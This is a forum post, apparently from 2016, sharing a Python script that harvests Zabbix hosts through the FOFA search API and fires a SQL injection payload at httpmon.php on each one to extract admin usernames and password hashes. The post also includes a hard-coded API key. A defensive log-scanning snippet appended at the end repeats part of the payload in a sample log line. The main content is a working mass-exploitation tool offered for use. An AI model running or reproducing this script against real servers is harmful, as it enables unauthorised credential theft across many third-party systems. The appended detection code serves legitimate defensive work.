HanDs
Administrator

FOFA search result harvesting and exploitation script





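While learning, please comply with the relevant national laws and regulations; hackers do no evil. Without cybersecurity there is no national security.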


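I saw someone asking about harvesting FOFA search results:
http://zone.wooyun.org/content/17971

Here is a simple harvest-and-exploit script I wrote a while ago. The code is very inefficient; I am only posting it to get the discussion started!

When you are not logged in, FOFA shows only part of the search results by default; you can use the API it provides to fetch all of the search results. It takes the form of a username plus the corresponding key.

The code searches for title=zabbix, runs the Zabbix injection exploit against the results it gets, and finally prints the vulnerable URLs and the password MD5.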

#coding:utf-8
 
import urllib2,urllib,cookielib
import re,sys
import base64
import os,json
 
def vulwebsearch(keywords):
    vulhostlist=[]
    urlenkeywords=urllib2.quote(keywords)
    searchurl="http://fofa.so/api/result?qbase64="+base64.b64encode(keywords)+"&key=d69f306296e8ca95fded42970400ad23&[email protected]"
    req=urllib2.urlopen(searchurl)
    restring=req.read()
    restring=json.loads(restring)
    zabbixsqli(restring['results'])
        
def zabbixsqli(vulhostlist):
    for vulhost in vulhostlist:
        if not vulhost.startswith('http'):
            vulhost="http://"+vulhost
        zabbix_url=vulhost  
        try:
            payload="""/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"""
              
            content=urllib.urlopen(zabbix_url)  
            if content.getcode()==200:
                fzadminmd5_url=zabbix_url+payload
                req=urllib2.urlopen(fzadminmd5_url)
                html=req.read()
                adminmd5=re.findall("\~.*\~\~",html)
                if len(adminmd5)==1:
                    print zabbix_url,adminmd5
            #zabbixweakpass(zabbix_url)  
        except:
            pass
          
if __name__=="__main__":
      
    if len(sys.argv)!=2:
        print "Usage:"+"python"+" fofa_zabbix.py "+"keywords"
        print "example:"+"python fofa_zabbix.py title=zabbix"
        sys.exit()
    else:
        vulwebsearch(sys.argv[1])

As shown in the figure:
[Image 1: FOFA search result harvesting and exploitation script | 阿德马 Web Security]

 

 



#1
Posted: 2016-8-8   |   Views: 0   |   Replies: 0
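
For defenders, the request this script sends to httpmon.php is visible in web server access logs. The following is an added example, not part of the original post: it flags httpmon.php requests whose `applications` parameter is not a plain numeric ID list. The log lines are constructed samples, and treating legitimate values as numeric IDs is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client, timestamp, request line, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Assumption: a legitimate `applications` value is a numeric ID or a comma-separated list of IDs
NUMERIC_IDS = re.compile(r'^\d+(,\d+)*$')
# Tokens characteristic of the error-based injection string shown in the post
SQL_TOKENS = ("select", "concat", "information_schema", "floor(rand", "group by")


def scan_line(line):
    """Return a finding dict for a suspicious httpmon.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, _method, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/httpmon.php"):
        return None
    # parse_qs percent-decodes values, so %20and%20%28select... becomes readable text
    values = parse_qs(parts.query, keep_blank_values=True).get("applications", [])
    for value in values:
        if NUMERIC_IDS.match(value.strip()):
            continue
        lowered = value.lower()
        tokens = [t for t in SQL_TOKENS if t in lowered]
        return {"client": client, "time": when, "status": int(status),
                "sql_tokens": tokens, "value": value[:80]}
    return None


def scan(lines):
    """Scan an iterable of access-log lines and return all findings."""
    return [f for f in map(scan_line, lines) if f]


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Aug/2016:10:00:01 +0800] "GET /httpmon.php?applications=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Aug/2016:10:00:05 +0800] "GET /httpmon.php?applications=2%20and%20%28select%201%20from%20information_schema.tables%29 HTTP/1.1" 200 901 "-" "Python-urllib/2.7"',
    '203.0.113.9 - - [08/Aug/2016:10:00:06 +0800] "GET /index.php HTTP/1.1" 200 300 "-" "Python-urllib/2.7"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only means the page was served; whether data was returned has to be checked against the response body or the database logs.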